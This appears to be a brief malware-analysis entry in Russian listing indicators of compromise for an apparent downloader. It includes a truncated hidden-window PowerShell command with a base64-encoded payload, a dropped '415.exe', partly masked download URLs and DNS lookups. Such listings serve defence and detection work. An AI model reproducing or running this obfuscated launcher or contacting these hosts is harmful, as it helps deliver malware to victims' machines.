Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -en JABIAGoAZgBiAG0AYwB4AG8AegBtAGEAPQAnAEcAagB2AGEAYgB0AHkAdABnAGIAaABmACcAOwAkAE8AcABtAGIAaQBxAGoAeABoAGsAIAA9ACAAJwA0ADEANQAnADsAJABQAHIAaABwAG8AdAB5AHYAeQBhAGEAagA9ACcASgBiAHAAagB...
- %HOMEPATH%\415.exe
- %WINDIR%\serviceprofiles\networkservice\appdata\locallow\microsoft\cryptneturlcache\metadata\f0accf77cdcbff39f6191887f6d2d357
- %WINDIR%\serviceprofiles\networkservice\appdata\locallow\microsoft\cryptneturlcache\content\f0accf77cdcbff39f6191887f6d2d357
- %HOMEPATH%\415.exe
- http://www.ya####rebastan.com/wp-content/9mg/
- http://vi##tory.ca/h/k/
- DNS ASK ya####rebastan.com
- DNS ASK vi##tory.ca
- DNS ASK br####massage.com
- DNS ASK ob###.toughjobs.org
- DNS ASK ua###say.com